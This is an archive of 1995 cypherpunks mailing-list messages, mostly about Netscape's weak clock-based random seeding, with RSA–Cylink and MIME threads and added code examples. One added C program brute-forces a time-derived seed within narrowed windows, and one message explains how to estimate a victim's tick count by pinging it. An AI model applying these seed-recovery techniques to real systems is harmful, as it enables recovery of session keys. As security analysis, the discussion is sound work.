MIME-Version: 1.0
Content-Type: text/plain


> 	The server process itself still needs access to that file
> though in order to verify passwords, so it can't be totally
> protected-- a bug in the server might reveal the password file. A
> relatively minor point..

Actually, it could communicate with a differently-privileged process.
The security gain probably isn't worth the performance hit, though.

(A possible secure channel: Give the password manager a uid of its own.
Have it listen on a unix-domain socket.  The server process opens the
socket, then fstat()s it to make sure it's really owned by the password
manager.)
-- 
Shields.
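
[Added example, not part of the original message: one way a server process could apply the ownership check described above before talking to the password manager. It goes a little further than the message by reading ownership from the socket's filesystem entry with lstat() and, where the platform has SO_PEERCRED, also asking the kernel for the peer's uid. The names check_socket_path, peer_uid, connect_to_manager and UntrustedEndpoint are hypothetical.]

```python
"""Client-side check that a unix-domain socket belongs to the expected uid."""
import os
import socket
import stat
import struct


class UntrustedEndpoint(Exception):
    """The socket is not provably owned by the password manager."""


def check_socket_path(path, manager_uid):
    """Raise unless `path` is a socket owned by manager_uid, inside a
    directory that only manager_uid or root is able to modify."""
    st = os.lstat(path)                  # lstat: never follow a symlink
    if not stat.S_ISSOCK(st.st_mode):
        raise UntrustedEndpoint(f"{path} is not a socket")
    if st.st_uid != manager_uid:
        raise UntrustedEndpoint(f"{path} is owned by uid {st.st_uid}")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_uid not in (0, manager_uid):
        raise UntrustedEndpoint("socket directory has an unexpected owner")
    if parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        # Anyone able to write here could replace the socket after the check.
        raise UntrustedEndpoint("socket directory is writable by others")


def peer_uid(sock):
    """uid of the process at the other end, or None if the platform does
    not provide SO_PEERCRED."""
    if not hasattr(socket, "SO_PEERCRED"):
        return None
    raw = sock.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                          struct.calcsize("iII"))
    _pid, uid, _gid = struct.unpack("iII", raw)   # struct ucred
    return uid


def connect_to_manager(path, manager_uid):
    """Return a connected socket, or raise UntrustedEndpoint."""
    check_socket_path(path, manager_uid)
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    try:
        sock.connect(path)
        uid = peer_uid(sock)
        if uid is not None and uid != manager_uid:
            raise UntrustedEndpoint(f"peer runs as uid {uid}")
    except BaseException:
        sock.close()
        raise
    return sock
```
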



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Tue, 19 Sep 95 23:52:11 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Investing on Information We Get Here
In-Reply-To: <ac843ff11a021004a43e@[205.199.118.202]>
Message-ID: <m0svJ0W-000DONC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> (These computer lists are really great for investors! I heard about the
> Apple problems a few days before they hit the street, and was able to
> unload a bunch of shares at $45, a day before it dropped, now down to
> around $36. "He who hesitates to act on inside information is lost.")

This isn't inside information in the illegal-to-trade-on-in-the-US sense,
is it?  cypherpunks, while maybe not mainstream, is publicly available.
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Wed, 20 Sep 95 00:02:52 PDT
To: tcmay@got.net (Timothy C. May)
Subject: MIME
In-Reply-To: <ac844fed1c0210046617@[205.199.118.202]>
Message-ID: <m0svJAY-000DTXC@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


> I'm dealing with it the same way I'm dealing with the few people who have
> something in their MIME setup that triggers my mailer (Eudora Pro 2.1) to
> treat their text as attachments. Namely, by filtering them out.

Because there were two complaints on this, I'd like to find out why.

I'm using a modified version of Elm, Michael Elkins' 2.4PL24ME4 version.
Among other features, this adds integrated PGP support, and uses the
content-type application/pgp for it.

Here is the complete header on the message I sent, as returned:

: From owner-cypherpunks@toad.com Sun Sep 17 23:26:25 1995
: Return-Path: <owner-cypherpunks@toad.com>
: Received: from relay3.UU.NET by yage.tembel.org with smtp 
: 	(Smail3.1.29.1 #9) id m0suQWm-000HZ2a; Sun, 17 Sep 95 16:41 EDT
: Received: from toad.com by relay3.UU.NET with SMTP 
: 	id QQzhpy19217; Sun, 17 Sep 1995 16:30:47 -0400
: Received: by toad.com id AA23554; Sun, 17 Sep 95 13:28:04 PDT
: Received: from yage.tembel.org by toad.com id AA23543; Sun, 17 Sep 95 13:27:55 PDT
: Received: by yage.tembel.org (Smail3.1.29.1 #9)
: 	id m0suQJV-000HYvC; Sun, 17 Sep 95 20:27 GMT
: Message-Id: <m0suQJV-000HYvC@yage.tembel.org>
: From: shields@tembel.org (Michael Shields)
: Subject: cypherpunks as a newsgroup
: To: cypherpunks@toad.com
: Date: Sun, 17 Sep 1995 20:27:43 +0000 (GMT)
: X-Dogma: Microsoft is not the answer.
:          Microsoft is the question.
:          No is the answer.
: Mime-Version: 1.0
: Content-Type: application/pgp
: Content-Transfer-Encoding: 7bit
: Sender: owner-cypherpunks@toad.com
: Precedence: bulk
: Content-Length: 1092

I think that it must be the content-type that is causing problems, as
the rest of the message is completely standard.  To the people whose
mailers broke out in hives at that message: Do you get the same behavior
with any message having an unknown content-type?
-- 
Shields.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 20 Sep 95 08:09:51 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199509201509.IAA19829@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 5:53 AM 9/20/95, Jeff Weinstein wrote:
>  This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we 

Maintain a 4K entropy buffer.

Mingle the exact time and place of each mouse hit into the
entropy buffer using some combination that will have the
effect of progressively shifting bits all over the place, so that every
noise bit that you get eventually affects every bit of the buffer in a
complicated way.

For example:

        Buf[p] = MouseNoise + Buf[p] + Buf[p-24] + Buf[p-55];
        p = p+1;

(See Knuth, SemiNumerical Algorithms, Book 2, page 27 for the 
magic properties of the numbers 24, 55.   This rule means 
that buffer immediately before p depends in a non linear 
fashion on all the noise you have received.)

Whenever you need a random number, take a one way checksum, 
for example MD5, of the most recently altered part of that 
buffer.  Use that as your random number. 

Whenever the user has used this buffer during a session, then 
when he quits netscape, save the buffer after first hashing 
it.

To hash the buffer without loss of entropy, take the hash of 
one block of the buffer, and XOR it onto the next block (not 
the block that you hashed.)  Repeat for each block in the 
buffer cyclically.


Publish your random number and encryption code here and in 
sci.crypt.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com
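
[Added example, not part of the original message and not Netscape's code: the buffer scheme described above written out in Python, with the indices wrapping around the 4K buffer. The block size, the width of the "most recently altered" window and the request counter are assumptions; unstir() is included only to show that the save pass can be undone, so it maps distinct buffers to distinct buffers.]

```python
"""Entropy buffer with lag-24/lag-55 mixing and MD5 extraction."""
import hashlib

POOL_SIZE = 4096        # "4K entropy buffer"
LAG_A, LAG_B = 24, 55   # lags given in the message
BLOCK = 16              # MD5 digest length used as block size (assumption)
RECENT = 64             # bytes counted as "most recently altered" (assumption)


class EntropyPool:
    def __init__(self, saved=None):
        if saved is None:
            self.buf = bytearray(POOL_SIZE)
        elif len(saved) == POOL_SIZE:
            self.buf = bytearray(saved)
        else:
            raise ValueError("saved pool must be POOL_SIZE bytes")
        self.p = 0
        self.requests = 0

    def _mix(self, noise):
        """Buf[p] = noise + Buf[p] + Buf[p-24] + Buf[p-55], then p = p + 1."""
        b, p = self.buf, self.p
        b[p] = (noise + b[p] + b[(p - LAG_A) % POOL_SIZE]
                + b[(p - LAG_B) % POOL_SIZE]) & 0xFF
        self.p = (p + 1) % POOL_SIZE

    def add_mouse_event(self, t_usec, x, y):
        """Mix the time and position of one mouse hit into the pool."""
        for value in (t_usec, x, y):
            for byte in (value & 0xFFFFFFFFFFFFFFFF).to_bytes(8, "little"):
                self._mix(byte)

    def random_bytes(self):
        """MD5 over the most recently altered RECENT bytes.

        A request counter is mixed in first (an addition, not in the
        message) so that two requests with no mouse input in between do
        not return the same value.
        """
        self.requests += 1
        for byte in self.requests.to_bytes(8, "little"):
            self._mix(byte)
        recent = bytes(self.buf[(self.p - RECENT + i) % POOL_SIZE]
                       for i in range(RECENT))
        return hashlib.md5(recent).digest()

    def save(self):
        """Pool contents after the hash-and-XOR pass, ready to write out."""
        return stir(bytes(self.buf))


def _xor_pass(pool, order):
    """XOR MD5(block i) onto block i+1, wrapping, visiting i in `order`."""
    b = bytearray(pool)
    n = len(b) // BLOCK
    for i in order(range(n)):
        digest = hashlib.md5(b[i * BLOCK:(i + 1) * BLOCK]).digest()
        j = ((i + 1) % n) * BLOCK
        for k in range(BLOCK):
            b[j + k] ^= digest[k]
    return bytes(b)


def stir(pool):
    """The pass applied before saving: blocks visited first to last."""
    return _xor_pass(pool, iter)


def unstir(pool):
    """Inverse of stir(): the same pass with blocks visited last to first."""
    return _xor_pass(pool, reversed)
```
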





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@iglou.com (Steven Weller)
Date: Wed, 20 Sep 95 07:13:13 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Netscape sub rosa?
Message-ID: <v01530501ac85ddd1205c@[199.171.88.71]>
MIME-Version: 1.0
Content-Type: text/plain


>Gee, where's that "Cypherpunks logo" when you really need it?

From a PR standpoint, this is the best idea of the year.

>A rose covering the Netscape "N" logo? A crypto eagle swooping down and
>pecking at weak keys?

How about a big 200 pin PGA chip with a jagged crack right across it?
Implications of "broken" or "cracked", obviously technical/electronic, and
echoes of Clipper. Throw some streams of ones and zeroes in the background
for good measure.



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@iglou.com                  |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 20 Sep 95 05:50:38 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: netscape's response
In-Reply-To: <43oa83$nhm@tera.mcom.com>
Message-ID: <199509201245.AA11962@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jeff--

First of all, let me commend you for your honesty and forthrightness
in owning up to the problem. I applaud it both as a cypherpunk and as
one of the guys at Intergraph who pushed really hard to get an OEM
agreement with NCC.

>   If the Navigator is running on a Mac or PC, then the two seeds are
> the current time and the "tick count", which is milliseconds since starting
> windows for the PC version, and some time unit since booting on the Mac.

The Mac tick unit is 1/60th of a second, and TickCount() returns the
number of ticks since the system was booted. I think you could safely
narrow the range down to between 0 and (3600 * 24 * 60 =) 5,184,000,
or about 24 bits. That's better than on the Unix boxes, but not
insurmountable.

>   This was a bad mistake on our part, and we are working hard to fix it.
> We have been trying to identify sources of random bits on PCs, Macs, and
> all of the many unix platforms we support.  We are looking at stuff that
> is system dependent, user dependent, hardware dependent, random external
> sources such as the network and the user.  If anyone has specific
> suggestions I would love to hear them so that we can do a better job.

I wouldn't consider the network to be suitably random. How many of
your users are using Netscape over high-latency, low-speed 14.4
PPP/SLIP links? A lot, I'd bet. Not much good-quality randomness
there.

> > "Netscape has also begun to engage an external group of world-class
> > security experts who will review our solution to this problem before
> > it is sent to customers."
> > 
> > 	A group which offered to review the first version, but
> > Netscape refused.

>   Do you mean that cypherpunks offered to review the netscape code
> if only we made all the source available on the net?  I think that it
> is unrealistic to expect us to release all of our source code to the
> net.  

Unrealistic to expect, yes. Unreasonable to ask? Maybe not.

>   I realize that some cypherpunks think that we should make all of
> our code publicly available.  In an ideal world that would be great,
> but we live in a world with politicians, crooks, lawyers, stockholders,
> etc...  Don't expect to see us posting our entire security
> library source code to cypherpunks.

That's probably not the most likely thing-- but why not allow people
with some security & crypto background _from this list_ see the code,
under NDA, for review? Jim Gillogly, Hal Finney, and several others
have shown a past talent for that sort of thing.

Frankly, a signed message from, say, Hal saying "I've looked over the
code and it looks pretty good" would carry a lot of water with me. In
turn, I could communicate my warm fuzzy feeling to the dozen or so
people that asked me about the security flaw yesterday, including our
network ops guy.

Cheers,
- -Paul

- -- 
Paul Robichaux, KD4JZG       | "Things are much simpler and less stressful
perobich@ingr.com            |  when you don't look to the law to fix things."
Not speaking for Intergraph  |      - Tim May (tcmay@got.net) on cypherpunks
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGANAafb4pLe9tolAQH+uQP7B7XvqVGnN4rDnSNth2PyVio5W5CpuA2U
DgWwjV1DqPJCzA4BmM3/rRlYYG8Z2d50i5zb0XD6XbMi6bpkc9fGBZ6156p7sKa1
DDk8hWAr+BvIcuYTC2irRTee7462YBjsBvwOiFVV+0/Wdbg2gjGfPgcmsxmzqi4R
Tby1/d2Pr6c=
=xm2W
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 05:49:32 PDT
To: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Subject: Re: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <9509201248.AA09892@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Bill Sommerfeld writes:
 > >   the second 32bit seed is the "tick count", which I'm told is the number of
 > > milliseconds since windows started.
 > 
 > A 32-bit ms-resolution counter wraps roughly every 50 days.  Very few
 > Windoze PC's stay up that long :-).

Also (and note that it's been a while since I've messed around with
PC's, but since the "architecture" remains chained to an early-80's
design I suspect they're still the same) the PC clock frequency is
generally pretty low.  PC UNIX implementations usually run it at about
100 Hz, I think.  There aren't a lot of available timers on the PC.
One of them used to be used as the DRAM refresh timer; I don't know
whether they still do that.

On the other hand, getting at a Windows PC over the network is a whole
'nuther enchilada, though if I want to keep my day job I need to get
that figured out real soon now.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rob L <robl@on-ramp.ior.com>
Date: Wed, 20 Sep 95 07:54:16 PDT
To: perobich@ingr.com
Subject: [NOISE] Re: Cylink
In-Reply-To: <199509201343.AA12329@poboy.b17c.ingr.com>
Message-ID: <Pine.LNX.3.91.950920075230.32738A-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain




> What about Roger Schlafly's suit? Anything new on it?
> - -Paul

Some pin stripping and a spot of tomato soup.. <g>

(sorry.. couldn't pass it up..




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 20 Sep 95 05:11:07 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <29391.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  "Jeff Weinstein" <jsw@netscape.com>  writes:

> The issue is that any statement that only mentions the 1 minute figure
> is only stating part of the story, just as a statement giving a figure
> of several hours is only mentioning a part of the story.  All of the
> news articles I've seen (not an exhaustive sample) have only mentioned
> the 1 minute number, which only really affects a relatively small
> number of our customers.

The Washington Post ran an article today in the Business section. Its
byline said Elizabeth Corcoran.  It referred to the four hour attack figure.
It appeared to be mostly a rewrite of the Netscape press release -- nearly
no quotes, no quoted local sources (TIS, Denning, etc.)

I expect that many papers that are far from Silicon Valley will
print it with a similar spin.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 05:12:05 PDT
To: aba@atlas.ex.ac.uk
Subject: Re: NYT on Netscape Crack
In-Reply-To: <155.9509191654@exe.dcs.exeter.ac.uk>
Message-ID: <199509201211.IAA04771@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



aba@atlas.ex.ac.uk writes:
> Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com> writes:
> > Oh, can we now expect to see source to at least the security portions of  
> > Navigator and the Commerce server?

> An excellent proposal.

Not especially useful. The bulk of the security problems won't
obviously have anything to do with the "security" portion of the code.

> Save Ian and David the effort of reverse engineering it again (which
> it is obviously pointless, and more: mathematically impossible, to do),

What do you mean, mathematically impossible? That's silly.

> Or if that doesn't sit well with copyright interests, how about
> writing up an open spec about how the random number generator works?
> Then we can critique it.

That makes good sense, but I doubt they are that sensible. I also
worry that they would try to do something like patenting obvious and
long used techniques to "protect" themselves.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Sommerfeld <sommerfeld@orchard.medford.ma.us>
Date: Wed, 20 Sep 95 05:25:33 PDT
To: jsw@neon.netscape.com (Jeff Weinstein)
Subject: Re: My Day
In-Reply-To: <43oquc$70f@tera.mcom.com>
Message-ID: <199509201218.MAA00433@orchard.medford.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


A couple comments on using the time as a seed:

Any system running NTP will let you know its clock to within a couple
ms; some folks have gotten NTP accuracy down to the high hundred
microseconds on real-time systems..

Any entropy you get from sampling the system clock will have to come
from the low-order bits of the tv_usec, or equivalent, and you'll only
get a few bits per sample.

Getting real entropy from mouse movements under X may be tricky,
because the X server goes out of its way to compress mouse movement
reporting and to buffer events sent to the client ("X is an exercise
in avoiding system calls").  You'll probably get less entropy than you
might think.

>   the second 32bit seed is the "tick count", which I'm told is the number of
> milliseconds since windows started.

A 32-bit ms-resolution counter wraps roughly every 50 days.  Very few
Windoze PC's stay up that long :-).

In a long-term active attack, the tick count can be estimated by
periodically pinging the system under attack, noticing when it goes
off the air and then back on again, and using that as a base value for
the tick count search, so the tick count probably only adds a factor
of somewhat less than 2**10 to the keyspace, not 2**32.

					- Bill
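[Added example, not part of Bill Sommerfeld's message and not code from Netscape or the list: a C audit of how many bits a seed built from the clock's microsecond field and a millisecond tick count still hides once an observer knows the clock to a couple of ms and the tick count to within 2**10. The seed layout, the mixer, the sample values and the window sizes are assumptions constructed for illustration.]

```c
#include <stdint.h>
#include <stdio.h>

/* Constructed stand-in for a seed built from two clock-derived words:
 * the microsecond field of the wall clock and a millisecond tick count.
 * This is not Netscape's code; the layout and the mixer are assumptions. */
struct seed { uint32_t usec; uint32_t tick_ms; };

/* Inclusive range of values an outside observer cannot rule out. */
struct window { uint32_t lo, hi; };

/* Toy mixer (the splitmix64 finalizer) standing in for whatever hash turns
 * the seed words into key material. It is a bijection on 64 bits, so each
 * seed maps to exactly one output. */
static uint64_t mix(struct seed s)
{
    uint64_t x = ((uint64_t)s.usec << 32) | s.tick_ms;
    x = (x ^ (x >> 30)) * 0xbf58476d1ce4e5b9ULL;
    x = (x ^ (x >> 27)) * 0x94d049bb133111ebULL;
    return x ^ (x >> 31);
}

/* Smallest b with 2^b >= n: the bits still unknown for n candidates. */
unsigned bits_for(uint64_t n)
{
    unsigned b = 0;
    while (b < 64 && ((uint64_t)1 << b) < n)
        b++;
    return b;
}

static uint64_t window_size(struct window w)
{
    return (uint64_t)w.hi - w.lo + 1;
}

/* Upper bound on the seed entropy left once both windows are known.
 * Summing per-word bit counts avoids overflowing a 64-bit product. */
unsigned effective_bits(struct window usec, struct window tick)
{
    return bits_for(window_size(usec)) + bits_for(window_size(tick));
}

/* Audit helper: walk every candidate in the windows and count the tries
 * needed to reproduce the observed output. Returns 1 when found. */
int recover(uint64_t observed, struct window usec, struct window tick,
            struct seed *out, uint64_t *tries)
{
    *tries = 0;
    for (uint64_t u = usec.lo; u <= usec.hi; u++) {
        for (uint64_t t = tick.lo; t <= tick.hi; t++) {
            struct seed s = { (uint32_t)u, (uint32_t)t };
            ++*tries;
            if (mix(s) == observed) {
                *out = s;
                return 1;
            }
        }
    }
    return 0;
}

int main(void)
{
    /* Constructed sample: the seed the program actually used. */
    struct seed truth = { 734512, 5432100 };
    /* Nominal ranges: tv_usec is 0..999999, the tick count a full 32 bits. */
    struct window usec_all = { 0, 999999 }, tick_all = { 0, UINT32_MAX };
    /* Assumed observer knowledge: clock to +/-2 ms, tick base to 2^10 ms. */
    struct window usec_known = { 732512, 736512 };
    struct window tick_known = { 5431700, 5432723 };
    struct seed got;
    uint64_t tries;

    printf("nominal bits:   %u\n", effective_bits(usec_all, tick_all));
    printf("effective bits: %u\n", effective_bits(usec_known, tick_known));
    if (recover(mix(truth), usec_known, tick_known, &got, &tries))
        printf("seed reproduced after %llu tries\n",
               (unsigned long long)tries);
    return 0;
}
```

[The gap between the nominal and effective figures is the reason a seed of this kind needs input the observer cannot bound, such as an operating-system entropy source.]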




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Wed, 20 Sep 95 06:55:15 PDT
To: perry@piermont.com
Subject: Re: Cylink
In-Reply-To: <199509201328.JAA04874@frankenstein.piermont.com>
Message-ID: <199509201343.AA12329@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


> Andrew Loewenstern writes:
> > Any ideas on how this will change the legal status of RSAREF and PGP?

Then Perry Metzger replied:
> I'm much more interested in how this changes the legal status of the
> D-H derived encryption systems like ElGamal, and how it alters the
> patent status on the DSS, which is basically also derived from the
> same root.

What I'm waiting to see is who sues RSADSI for recovery of royalties
paid to Cylink. Imagine how Apple, Lotus, and all of the other
bigcorps using RSA must feel right about now: they licensed a patent
from the wrong people, and it appears that RSADSI may have known that
their rights had expired.

What about Roger Schlafly's suit? Anything new on it?

- -Paul

- -- 
Paul Robichaux, KD4JZG       | "Things are much simpler and less stressful
perobich@ingr.com            |  when you don't look to the law to fix things."
Not speaking for Intergraph  |      - Tim May (tcmay@got.net) on cypherpunks
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGAajKfb4pLe9tolAQG8dwP+Mt8frNZVf87eQOlpIGZ0V7fJDD1CoLSg
6yt6inPeTcjUK52rYLV4ut2hm2q7yASsGi2PlXm+oXh9gi5rCjCNClR8ffRI/f3Z
PklwDT+KYm9XB9pJfDPJXzVf9jevY7Ge+m4QBFWymXiQ3DLhsu+Mh8kijTO47uJ9
rZHjHPFjBEo=
=UAqt
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@CS.Berkeley.EDU>
Date: Wed, 20 Sep 95 08:49:11 PDT
To: cypherpunks@toad.com
Subject: Munitions shirt (again)
Message-ID: <199509201549.IAA19844@cuzco.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


So, Dave and I got free munitions shirts (they're different, though;
the font is smaller and they have a bunch of X'd out Constitutional
Amendments on the back; I think they were designed by Joel Furr) for
our bug find.

So I'm wearing it today.  The thing is, I live in International House,
a residence that has 50% non-Americans.

So, any consensus as to whether it's actually illegal to do so?  I
remember some disagreement a few weeks ago that AFAIK wasn't resolved.

As far as I can tell, it's _technically_ illegal, but any LEO would be
out of his mind to try to enforce it (it would have to be a Fed, too,
wouldn't it?  Or can regular city cops get you for violating export
restrictions?).

   - Ian



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "baldwin" <baldwin@RSA.COM (Robert W. Baldwin)>
Date: Wed, 20 Sep 95 08:56:44 PDT
To: cypherpunks@toad.com
Subject: RSA Prevails In Arbitration Against Cylink
Message-ID: <9508208116.AA811612567@snail.rsa.com>
MIME-Version: 1.0
Content-Type: text/plain


        Here's an article on the RSA-Cylink arbitration from
the business wire.
                --Bob Baldwin
-   -----------------------------

RSA Prevails In Arbitration Against Cylink
REDWOOD CITY, Calif.--(BUSINESS WIRE)--Sept. 19, 1995--An Arbitration Panel 
recently ruled that Cylink does not have a license to RSA patented technology, 
that RSA's software licensing practices do not breach any agreement with Cylink 
or its wholly owned subsidiary Caro-Kann and that RSA now has the exclusive 
right to license the RSA patent.

In a Sept. 6, 1995 ruling, an Arbitration Panel, formed by agreement of the 
parties, and after nearly a month of testimony, ruled in favor of RSA on every 
significant issue. The Panel held that neither Cylink nor Caro-Kann had a 
license to practice RSA patented technology. Cylink admittedly incorporates this
technology in its Secure X.25 product line, without any license to do so.

The Panel also found that RSA's software licensing practices did not materially 
breach any of Cylink's rights. The Panel did not rule that anyone, (specifically
including RSA and its software customers) infringed any existing patent rights 
of anyone - including Cylink.

As a result of the Panel's ruling, RSA now has the exclusive right to license 
the patented RSA technology. According to Jim Bidzos, the President of RSA, `RSA
will continue to conduct its software business in exactly the same way that it 
has for the past ten years.

`In addition, RSA anticipates that licenses to the RSA Patent will now be much 
more readily available, because they can now be granted without Cylink 
interference. RSA has all of the intellectual property rights which it needs to 
license its software. RSA will vigorously defend against any claim to the 
contrary.`

A recent Cylink press release on the Ruling of the Arbitration Panel is wildly 
inaccurate. The same Robert Fougner (Cylink's General Counsel) who is cited in 
the Cylink press release has repeatedly made express representations to third 
parties that the Stanford Patents do not cover, and are not infringed by, the 
manufacture, use or sale of products incorporating RSA's TIPEM software 
developer's toolkit.

As noted by Mr. Bidzos: `Cylink lost every single significant issue in the 
Arbitration. Their press release was simply an attempt to cover up what has been
a crushing defeat.`

Questions regarding the Arbitration Panel Ruling or RSA licenses should be 
directed to Kurt Stammberger, RSA Technology Marketing Manager, or Paul Livesay,
RSA Director of Legal Affairs.

CONTACT: RSA

Kurt Stammberger, 415/595-8782

kurt@rsa.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 20 Sep 95 09:07:16 PDT
To: perry@piermont.com
Subject: Re: netscape's response
Message-ID: <9509201603.AA13810@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> This is not to say that I think *you* are bad at this, Mr. Weinstein,
> but you certainly have colleagues with the worst possible track record.
> 
> Perry
> 
How can you say worst possible...have you forgotten Eric Allman?  Wouldn't
it be fun to try to come up with the 5 worst programmers (as far as sloppy
security holes go).  Eric completely revamped sendmail to make V8 and
put in new holes in some of the same categories as some of the well known
old holes:(  I'm glad my code isn't held up to such public scrutiny after
it's released!  I'm doing some security/crypto stuff soon for my current
employer and I'll run my design by some of you.  I'll run the code by as
well if I can get my bosses to agree.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc>
Date: Wed, 20 Sep 95 08:58:33 PDT
To: sommerfeld@orchard.medford.ma.us (Bill Sommerfeld)
Subject: Re: My Day
In-Reply-To: <199509201218.MAA00433@orchard.medford.ma.us>
Message-ID: <199509201411.JAA04860@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> Getting real entropy from mouse movements under X may be tricky,
> because the X server goes out of its way to compress mouse movement
> reporting and to buffer events sent to the client ("X is an exercise
> in avoiding system calls").  You'll probably get less entropy than you
> might think.

Also add that many people seem to tend to swirl the mouse in fast circles,
where there isn't *any* latency between mouse movements, and you get even
less entropy.  I suspect that Colin Plumb's code, while a nice try, would
be a bit less useful than might have been otherwise suspected. 
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMGAhFSS9AwzY9LDxAQF/oAP/TrE912Sy8DqTG2oQQ3bgK//5bPGmoX1h
cVS4uwSrSJ+wdkkvExZV1I3eqkQCJEkZjsJp83ZtOD44nxOd9aDiY+XuarVU8UDW
f/9oPtYCjDU2MPD+Tu4ftL9I5B0WqT+V/4RAkvwPdqNnzqgNiCTIdPwEOHp+gNl2
Cv3/3e6/Bh4=
=pvSP
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 20 Sep 95 09:15:45 PDT
To: shields@tembel.org
Subject: Re: MIME
Message-ID: <9509201612.AA13835@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> : Content-Type: application/pgp
> : Content-Transfer-Encoding: 7bit
> : Sender: owner-cypherpunks@toad.com
> : Precedence: bulk
> : Content-Length: 1092
> 
> I think that it must be the content-type that is causing problems, as
> the rest of the message is completely standard.  To the people whose
> mailers broke out in hives at that message: Do you get the same behavior
> with any message having an unknown content-type?
> -- 
> Shields.
> 

I've only ever seen the problem with Content-Type: application/pgp using
